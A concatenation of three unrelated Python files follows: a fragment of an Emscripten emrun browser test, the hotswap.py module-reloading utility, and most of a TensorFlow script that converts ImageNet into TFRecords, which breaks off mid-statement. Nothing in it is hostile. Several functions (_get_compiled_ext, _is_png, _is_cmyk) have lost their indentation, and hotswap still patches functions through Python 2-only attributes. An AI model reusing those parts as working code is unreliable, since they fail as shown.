    self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
    if not has_browser():
      self.skipTest('need a browser')

    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the
    # browser that is launched will have that directory as startup directory, and the browser will
    # not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
    # delete it. Therefore switch away from that directory before launching.
    os.chdir(path_from_root())

    args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
                 '--kill_exit', '--port', '6939', '--verbose',
                 '--log_stdout', self.in_dir('stdout.txt'),
                 '--log_stderr', self.in_dir('stderr.txt')]

    # Verify that trying to pass argument to the page without the `--` separator will
    # generate an actionable error message
    err = self.expect_fail(args_base + ['--foo'])
    self.assertContained('error: unrecognized arguments: --foo', err)
    self.assertContained('remember to add `--` between arguments', err)

    if EMTEST_BROWSER is not None:
      # If EMTEST_BROWSER carried command line arguments to pass to the browser,
      # (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
      # so strip them out.
      browser_cmd = shlex.split(EMTEST_BROWSER)
      browser_path = browser_cmd[0]
      args_base += ['--browser', browser_path]
      if len(browser_cmd) > 1:
        browser_args = browser_cmd[1:]
        if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
          # emrun uses its own -profile, strip it out
          parser = argparse.ArgumentParser(add_help=False)  # otherwise it throws with -headless
          parser.add_argument('-profile')
          parser.add_argument('--profile')
          browser_args = parser.parse_known_args(browser_args)[1]
        if browser_args:
          args_base += ['--browser_args', ' ' + ' '.join(browser_args)]

    # Run once normally and once with private browsing (on a different port,
    # so the two launches don't collide).
    for args in [
        args_base,
        args_base + ['--private_browsing', '--port', '6941']
    ]:
      args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
      print(shared.shlex_join(args))
      proc = self.run_process(args, check=False)
      self.assertEqual(proc.returncode, 100)
      stdout = open(self.in_dir('stdout.txt'), 'r').read()
      stderr = open(self.in_dir('stderr.txt'), 'r').read()
      self.assertContained('argc: 4', stdout)
      self.assertContained('argv[3]: --3', stdout)
      self.assertContained('hello, world!', stdout)
      self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
      self.assertContained('Testing char sequences: %20%21 ä', stdout)
      self.assertContained('hello, error stream!', stderr)
|
hotswap.py | #!/usr/bin/env python
"""Automatic replacement of imported Python modules.
The hotswap module watches the source files of imported modules which are
replaced by its new version when the respective source files change.
The need for a program restart during development of long-running programs
like GUI applications for example is reduced.
Additionally this module can be called as a wrapper script:
hotswap.py [OPTIONS] <module.py> [args]
In this case module.py is imported as module and the function
module.main() is called. Hotswapping is enabled so that changes
in the source code take effect without restarting the program.
"""
version = "0.3.1"
__author__ = "Michael Krause"
__email__ = "michael@krause-software.com"
#
# CREDITS
# The idea and first implementation of the mechanism used by this module
# was first made public by Thomas Heller in a Usenet posting
# to comp.lang.python in 2001 (named autoreload.py).
# Updates for new-style classes were taken from a Usenet posting
# by Jeremy Fincher.
__all__ = ['run', 'stop', 'superreload']
import time
import os
import threading
import sys
import types
import imp
import getopt
# Interpreter major-version flags used by the 2/3 compatibility shims below.
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3

# On Python 3 the builtin reload() is gone; pull it from importlib instead.
try:
    reload
except NameError:
    from importlib import reload

# Unified class-type aliases: old-style classes only exist on Python 2;
# on Python 3 every class is simply `type`.
if PY2:
    TypeType = types.TypeType
    ClassType = types.ClassType
else:
    TypeType = type
    ClassType = type
def _get_compiled_ext():
for ext, mode, typ in imp.get_suffixes():
if typ == imp.PY_COMPILED:
return ext
# the official way to get the extension of compiled files (.pyc or .pyo)
PY_COMPILED_EXT = _get_compiled_ext()
class ModuleWatcher:
    """Background watcher that reloads modules whose source files changed.

    A daemon thread periodically scans sys.modules, compares each module's
    source-file mtime against the last value seen, and runs superreload()
    on any module whose .py file became newer.
    """

    # Class-level defaults; run() copies its arguments over these names
    # onto the instance.
    SECONDS_BETWEEN_CHECKS = 0.1
    SKIP_SYSTEM_MODULES = False
    NOTIFYFUNC = None  # optional callback, invoked as NOTIFYFUNC(module=m) after a reload
    VERBOSE = False
    running = 0  # flag read by the worker thread's loop; 0 stops it

    def __init__(self):
        # If we don't do this, there may be tracebacks
        # when shutting down python.
        import atexit
        atexit.register(self.stop)

    def run(self, skipsystem=SKIP_SYSTEM_MODULES,
            seconds=SECONDS_BETWEEN_CHECKS,
            notifyfunc=NOTIFYFUNC,
            verbose=VERBOSE):
        """Start the watcher thread; a no-op if it is already running."""
        if self.running:
            if verbose:
                print("# hotswap already running")
            return
        # Store the effective settings on the instance, shadowing the
        # class-level defaults.
        self.SKIP_SYSTEM_MODULES = skipsystem
        self.SECONDS_BETWEEN_CHECKS = seconds
        self.NOTIFYFUNC = notifyfunc
        self.VERBOSE = verbose
        if self.VERBOSE:
            print("# starting hotswap seconds=%s, skipsystem=%s" \
                  % (self.SECONDS_BETWEEN_CHECKS, self.SKIP_SYSTEM_MODULES))
        self.running = 1
        # Daemon thread so it never blocks interpreter shutdown.
        self.thread = threading.Thread(target=self._check_modules)
        self.thread.setDaemon(1)
        self.thread.start()

    def stop(self):
        """Stop the watcher thread and wait for it to finish."""
        if not self.running:
            if self.VERBOSE:
                print("# hotswap not running")
            return
        self.running = 0
        self.thread.join()
        if self.VERBOSE:
            print("# hotswap stopped")

    def _check_modules(self):
        """Worker-thread loop: poll source files and reload changed modules."""
        # Maps source file path -> last seen mtime.
        last_modified = {}
        while self.running:
            time.sleep(self.SECONDS_BETWEEN_CHECKS)
            for m in list(sys.modules.values()):
                if not hasattr(m, '__file__'):
                    # We only check modules that have a plain file
                    # as Python source.
                    continue
                if m.__name__ == '__main__':
                    # __main__ cannot be reloaded without executing
                    # its code a second time, so we skip it.
                    continue
                file = m.__file__
                path, ext = os.path.splitext(file)
                if self.SKIP_SYSTEM_MODULES:
                    # do not check system modules
                    sysprefix = sys.prefix + os.sep
                    if file.startswith(sysprefix):
                        continue
                # Normalize: a module loaded from .py is treated like its
                # compiled form; anything else (extensions etc.) is skipped.
                if ext.lower() == '.py':
                    ext = PY_COMPILED_EXT
                if ext != PY_COMPILED_EXT:
                    continue
                sourcefile = path + '.py'
                try:
                    # index 8 in the stat tuple is st_mtime
                    source_mtime = os.stat(sourcefile)[8]
                    if sourcefile not in last_modified:
                        # First sighting: just record the mtime.
                        last_modified[sourcefile] = source_mtime
                        continue
                    else:
                        if source_mtime <= last_modified[sourcefile]:
                            continue
                        last_modified[sourcefile] = source_mtime
                except OSError:
                    # Source file missing or unreadable; ignore this module.
                    continue
                try:
                    superreload(m, verbose=self.VERBOSE)
                except:
                    # A broken reload must never kill the watcher thread.
                    import traceback
                    traceback.print_exc(0)
                try:
                    if hasattr(m, 'onHotswap') and callable(m.onHotswap):
                        # The module can invalidate cached results or post
                        # redisplay operations by defining function named
                        # onHotswap that is called after a reload.
                        m.onHotswap()
                    if callable(self.NOTIFYFUNC):
                        self.NOTIFYFUNC(module=m)
                except:
                    import traceback
                    traceback.print_exc(0)
def update_function(old, new, attrnames):
    """Copy each attribute named in *attrnames* from *new* onto *old*.

    Names that are missing on *new* (or not settable on *old*) are
    silently skipped.
    """
    for attrname in attrnames:
        try:
            value = getattr(new, attrname)
        except AttributeError:
            continue
        try:
            setattr(old, attrname, value)
        except AttributeError:
            pass
def superreload(module,
                reload=reload,
                _old_objects = {},
                verbose=True):
    """superreload (module) -> module
    Enhanced version of the builtin reload function.
    superreload replaces the class dictionary of every top-level
    class in the module with the new one automatically,
    as well as every function's code object.
    """
    # NOTE: the mutable default `_old_objects` is intentional — it is a cache
    # that persists across calls, so objects from *every* previous version of
    # the module get patched, not only those from the most recent one.

    # retrieve the attributes from the module before the reload,
    # and remember them in _old_objects.
    for name, object in module.__dict__.items():
        key = (module.__name__, name)
        _old_objects.setdefault(key, []).append(object)
    if verbose:
        print("# reloading module %r" % module)
    newmodule = reload(module)
    if newmodule is None:
        # Reload produced nothing usable; keep the old module object.
        return module
    # XXX We have a problem here if importing the module fails!

    # iterate over all objects and update them
    for name, new_obj in newmodule.__dict__.items():
        # print "updating", `name`, type(new_obj), `new_obj`
        key = (newmodule.__name__, name)
        if key in _old_objects:
            for old_obj in _old_objects[key]:
                if type(new_obj) == ClassType:
                    # Patch the old class in place so existing instances
                    # immediately see the new methods/attributes.
                    if hasattr(old_obj.__dict__, 'update'):
                        old_obj.__dict__.update(new_obj.__dict__)
                elif type(new_obj) == types.FunctionType:
                    # NOTE(review): func_code/func_defaults/func_doc are the
                    # Python 2 attribute names (__code__ etc. on Python 3) —
                    # confirm before relying on function patching under Py3.
                    update_function(old_obj,
                                    new_obj,
                                    "func_code func_defaults func_doc".split())
                elif type(new_obj) == types.MethodType:
                    # im_func is Python 2 only as well.
                    update_function(old_obj.im_func,
                                    new_obj.im_func,
                                    "func_code func_defaults func_doc".split())
    return newmodule
# Module-level singleton watcher; the public run/stop entries in __all__
# are simply bound methods of this instance.
_watcher = ModuleWatcher()
run = _watcher.run
stop = _watcher.stop
def modulename(path):
    """Turn a relative source path into a dotted module name ('a/b.py' -> 'a.b')."""
    stem, _ext = os.path.splitext(path)
    return stem.replace(os.sep, '.')
def importmodule(filename):
    """Returns the imported module of this source file.
    This function tries to find this source file as module
    on the Python path, so that its typical module name is used.
    If this does not work, the directory of this file is inserted
    at the beginning of sys.path and the import is attempted again.
    """
    sourcefile = os.path.abspath(filename)
    modfile = os.path.basename(sourcefile)
    # Given an absolute filename of a python source file,
    # we need to find it on the Python path to calculate its
    # proper module name.
    candidates = []
    for p in sys.path:
        pdir = p + os.sep
        if os.path.normcase(sourcefile).startswith(os.path.normcase(pdir)):
            relmodfile = sourcefile[len(pdir):]
            candidates.append((len(relmodfile), relmodfile))
    if candidates:
        # Pick the most specific module path from all candidates
        candidates.sort()
        modname = modulename(candidates[0][1])
    else:
        modname = modulename(os.path.basename(sourcefile))
    try:
        # In case the source file was in the Python path
        # it can be imported now.
        module = __import__(modname, globals(), locals(), [])
    except ImportError as e:
        failed_modname = str(e).split()[-1]
        failed_modname = failed_modname.replace("'", "")
        if failed_modname == modname:
            # The ImportError wasn't caused by some nested import
            # but our module was not found, so we add the source files
            # directory to the path and import it again.
            modname = modulename(os.path.basename(sourcefile))
            sys.path.insert(0, os.path.dirname(sourcefile))
            module = __import__(modname, globals(), locals(), [])
        else:
            import traceback
            # Python 3 fix: sys.exc_type/exc_value/exc_traceback were removed;
            # sys.exc_info() is the portable spelling. Skip the first frame so
            # the printed traceback starts inside the imported module.
            etype, evalue, tb = sys.exc_info()
            if tb:
                tb = tb.tb_next
            traceback.print_exception(etype, evalue, tb)
            # The module to be imported could be found but raised an
            # ImportError itself.
            raise e
    # We have to deal module nesting like logging.handlers
    # before calling the modules main function.
    components = modname.split('.')
    for comp in components[1:]:
        module = getattr(module, comp)
    return module
#----------------------------------------------------------------------------
class Usage(Exception):
    """Command-line usage error carrying the message to show the user."""

    def __init__(self, msg):
        # Keep the message on a dedicated attribute; callers read `.msg`.
        self.msg = msg
def usage(argv0):
    """Print command-line help for the hotswap wrapper to stderr.

    Args:
        argv0: program name to show in the usage line.
    """
    # Python 3 fix: the original used the Python 2 statement form
    # `print >>sys.stderr, ...`, which is a SyntaxError on Python 3.
    print("""Usage: %s [OPTIONS] <module.py>
Import module and call module.main() with hotswap enabled.
Subsequent modifications in module.py and other source files of
modules being used are monitored periodically and put into effect
without restarting the program.

Options:
  -h, --help        Display this help then exit.
  -w, --wait        Wait number of seconds between checks. [0.1]
  -s, --skipsystem  Skip check of system modules beneath (%s). [False]
  -v, --verbose     Display diagnostic messages. [False]
""" % (argv0, sys.prefix), file=sys.stderr)
#----------------------------------------------------------------------------
def main(argv=None):
    """Entry point of the hotswap wrapper script.

    Parses the wrapper's own options, imports the target source file as a
    module, starts the hotswap watcher and finally calls module.main().
    Returns 0/2 for option handling, otherwise exits via sys.exit() or
    runs the wrapped program.
    """
    if argv is None:
        argv = sys.argv
    # Defaults come from the watcher's class-level settings.
    wait = ModuleWatcher.SECONDS_BETWEEN_CHECKS
    skipsystem = ModuleWatcher.SKIP_SYSTEM_MODULES
    verbose = ModuleWatcher.VERBOSE
    # parse command line arguments
    try:
        try:
            # Bug fix: "wait" was declared without a trailing '=', so the
            # long form --wait could never receive its argument ("hw:sv"
            # already declared -w as taking a value).
            opts, args = getopt.getopt(argv[1:], "hw:sv",
                                       ["help", "wait=",
                                        "skipsystem", "verbose"])
        except getopt.error as msg:
            raise Usage(msg)
        for o, a in opts:
            if o in ("-h", "--help"):
                usage(argv[0])
                return 0
            if o in ("-w", "--wait"):
                try:
                    wait = float(a)
                except ValueError:
                    raise Usage("Parameter -w/--wait expects a float value")
            if o in ("-s", "--skipsystem"):
                skipsystem = True
            if o in ("-v", "--verbose"):
                verbose = True
    except Usage as err:
        # Python 3 fix: replace the Python 2 `print >>sys.stderr` statements
        # with the print function (same output: "<prog>: <msg>").
        print("%s: %s" % (argv[0], err.msg), file=sys.stderr)
        print("for help use --help", file=sys.stderr)
        return 2

    # Remove hotswap options from arguments
    if args:
        del argv[1:-len(args)]
    else:
        del argv[1:]

    if len(argv) <= 1:
        usage(argv[0])
        sys.exit(1)

    firstarg = argv[1]
    sourcefile = os.path.abspath(firstarg)
    if not os.path.isfile(sourcefile):
        print("%s: File '%s' does not exist." % (os.path.basename(argv[0]),
                                                 sourcefile))
        sys.exit(1)
    try:
        module = importmodule(sourcefile)
    except ImportError as e:
        print("%s: Unable to import '%s' as module: %s" % (os.path.basename(argv[0]),
                                                           sourcefile, e))
        sys.exit(1)
    # Remove hotswap.py from arguments that argv looks as
    # if no additional wrapper was present.
    del argv[0]
    # Start hotswapping
    run(skipsystem=skipsystem,
        seconds=wait,
        verbose=verbose)
    # Run the Python source file with hotswapping enabled.
    module.main()


if __name__ == '__main__':
    main()
|
build_imagenet_data.py | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-01023-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always 'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on an HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
# Command-line flags controlling input/output locations and sharding.
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
                           'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
                           'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
                           'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
                            'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
                            'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
                            'Number of threads to preprocess the images.')

# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
#   n01440764
#   n01443537
#   n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
                           'imagenet_lsvrc_2015_synsets.txt',
                           'Labels file')

# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
#   n02119247    black fox
#   n02119359    silver fox
#   n02119477    red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
                           'imagenet_metadata.txt',
                           'ImageNet metadata file')

# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
#   n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
#   <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist multiple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
                           './imagenet_2012_bounding_boxes.csv',
                           'Bounding box file')

# Parsed flag values, read throughout this script.
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
  """Wrapper for inserting int64 features into Example proto."""
  # Accept either a single int or a list of ints.
  values = value if isinstance(value, list) else [value]
  return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
  """Wrapper for inserting float features into Example proto."""
  # Accept either a single float or a list of floats.
  values = value if isinstance(value, list) else [value]
  return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
  """Wrapper for inserting bytes features into Example proto."""
  # Python 3 fix: callers pass str values (colorspace, format, synset,
  # human label) but BytesList requires bytes — encode them here. On
  # Python 2 `str` is already bytes and passes through unchanged.
  if not isinstance(value, bytes):
    value = value.encode('utf-8')
  return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
                        height, width):
  """Build an Example proto for an example.
  Args:
    filename: string, path to an image file, e.g., '/path/to/example.JPG'
    image_buffer: string, JPEG encoding of RGB image
    label: integer, identifier for the ground truth for the network
    synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
    human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
    bbox: list of bounding boxes; each box is a list of integers
      specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
      the same label as the image label.
    height: integer, image height in pixels
    width: integer, image width in pixels
  Returns:
    Example proto
  """
  xmin = []
  ymin = []
  xmax = []
  ymax = []
  for b in bbox:
    assert len(b) == 4
    # Distribute each box's [xmin, ymin, xmax, ymax] coordinates into the
    # matching per-coordinate list. (Idiom fix: an explicit loop replaces
    # the previous list comprehension that was used only for side effects.)
    for coords, point in zip([xmin, ymin, xmax, ymax], b):
      coords.append(point)

  colorspace = 'RGB'
  channels = 3
  image_format = 'JPEG'

  example = tf.train.Example(features=tf.train.Features(feature={
      'image/height': _int64_feature(height),
      'image/width': _int64_feature(width),
      'image/colorspace': _bytes_feature(colorspace),
      'image/channels': _int64_feature(channels),
      'image/class/label': _int64_feature(label),
      'image/class/synset': _bytes_feature(synset),
      'image/class/text': _bytes_feature(human),
      'image/object/bbox/xmin': _float_feature(xmin),
      'image/object/bbox/xmax': _float_feature(xmax),
      'image/object/bbox/ymin': _float_feature(ymin),
      'image/object/bbox/ymax': _float_feature(ymax),
      'image/object/bbox/label': _int64_feature([label] * len(xmin)),
      'image/format': _bytes_feature(image_format),
      'image/filename': _bytes_feature(os.path.basename(filename)),
      'image/encoded': _bytes_feature(image_buffer)}))
  return example
class ImageCoder(object):
  """Helper class that provides TensorFlow image coding utilities.

  Builds a small graph of placeholder-fed ops once and reuses a single
  Session for every conversion/decoding call.
  """

  def __init__(self):
    # Create a single Session to run all image coding calls.
    self._sess = tf.Session()

    # Initializes function that converts PNG to JPEG data.
    self._png_data = tf.placeholder(dtype=tf.string)
    image = tf.image.decode_png(self._png_data, channels=3)
    self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)

    # Initializes function that converts CMYK JPEG data to RGB JPEG data.
    self._cmyk_data = tf.placeholder(dtype=tf.string)
    # channels=0 lets the decoder infer the channel count from the file.
    image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
    self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)

    # Initializes function that decodes RGB JPEG data.
    self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
    self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)

  def png_to_jpeg(self, image_data):
    """Re-encode PNG bytes as RGB JPEG bytes."""
    return self._sess.run(self._png_to_jpeg,
                          feed_dict={self._png_data: image_data})

  def cmyk_to_rgb(self, image_data):
    """Re-encode a CMYK JPEG as an RGB JPEG (both as bytes)."""
    return self._sess.run(self._cmyk_to_rgb,
                          feed_dict={self._cmyk_data: image_data})

  def decode_jpeg(self, image_data):
    """Decode JPEG bytes into a rank-3 RGB image array (H, W, 3)."""
    image = self._sess.run(self._decode_jpeg,
                           feed_dict={self._decode_jpeg_data: image_data})
    assert len(image.shape) == 3
    assert image.shape[2] == 3
    return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
  """Process a single image file.
  Args:
    filename: string, path to an image file e.g., '/path/to/example.JPG'.
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
  Returns:
    image_buffer: string, JPEG encoding of RGB image.
    height: integer, image height in pixels.
    width: integer, image width in pixels.
  """
  # Read the image file.
  # NOTE(review): mode 'r' reads text on Python 3; binary image data likely
  # needs 'rb' there — confirm against the targeted TF/Python version.
  with tf.gfile.FastGFile(filename, 'r') as f:
    image_data = f.read()

  # Clean the dirty data.
  if _is_png(filename):
    # 1 image is a PNG.
    print('Converting PNG to JPEG for %s' % filename)
    image_data = coder.png_to_jpeg(image_data)
  elif _is_cmyk(filename):
    # 22 JPEG images are in CMYK colorspace.
    print('Converting CMYK to RGB for %s' % filename)
    image_data = coder.cmyk_to_rgb(image_data)

  # Decode the RGB JPEG (only to validate it and read its dimensions; the
  # encoded bytes are what gets written to the TFRecord).
  image = coder.decode_jpeg(image_data)

  # Check that image converted to RGB
  assert len(image.shape) == 3
  height = image.shape[0]
  width = image.shape[1]
  assert image.shape[2] == 3

  return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.
  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  # Split this thread's overall file range evenly into per-shard sub-ranges.
  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in range(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      # Periodic progress report from this worker thread.
      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    writer.close()
    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
                         bboxes, num_shards):
  """Process and save list of images as TFRecord of Example protos.
  Args:
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  assert len(filenames) == len(synsets)
  assert len(filenames) == len(labels)
  assert len(filenames) == len(humans)
  assert len(filenames) == len(bboxes)

  # Break all images into batches with a [ranges[i][0], ranges[i][1]].
  # Fix: np.int was deprecated and removed in NumPy 1.24; the builtin int is
  # the documented replacement and behaves identically here.
  spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
  ranges = []
  for i in range(len(spacing) - 1):
    ranges.append([spacing[i], spacing[i + 1]])

  # Launch a thread for each batch.
  print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
  sys.stdout.flush()

  # Create a mechanism for monitoring when all threads are finished.
  coord = tf.train.Coordinator()

  # Create a generic TensorFlow-based utility for converting all image codings.
  coder = ImageCoder()

  # (A redundant second `threads = []` initialization was removed.)
  threads = []
  for thread_index in range(len(ranges)):
    args = (coder, thread_index, ranges, name, filenames,
            synsets, labels, humans, bboxes, num_shards)
    t = threading.Thread(target=_process_image_files_batch, args=args)
    t.start()
    threads.append(t)

  # Wait for all the threads to terminate.
  coord.join(threads)
  print('%s: Finished writing all %d images in data set.' %
        (datetime.now(), len(filenames)))
  sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
  """Build a list of all images files and labels in the data set.
  Args:
    data_dir: string, path to the root directory of images.
      Assumes that the ImageNet data set resides in JPEG files located in
      the following directory structure.
        data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
        data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
      where 'n01440764' is the unique synset label associated with these images.
    labels_file: string, path to the labels file.
      The list of valid labels are held in this file. Assumes that the file
      contains entries as such:
        n01440764
        n01443537
        n01484850
      where each line corresponds to a label expressed as a synset. We map
      each synset contained in the file to an integer (based on the alphabetical
      ordering) starting with the integer 1 corresponding to the synset
      contained in the first line.
      The reason we start the integer labels at 1 is to reserve label 0 as an
      unused background class.
  Returns:
    filenames: list of strings; each string is a path to an image file.
    synsets: list of strings; each string is a unique WordNet ID.
    labels: list of integer; each integer identifies the ground truth.
  """
  print('Determining list of input files and labels from %s.' % data_dir)
  challenge_synsets = [l.strip() for l in
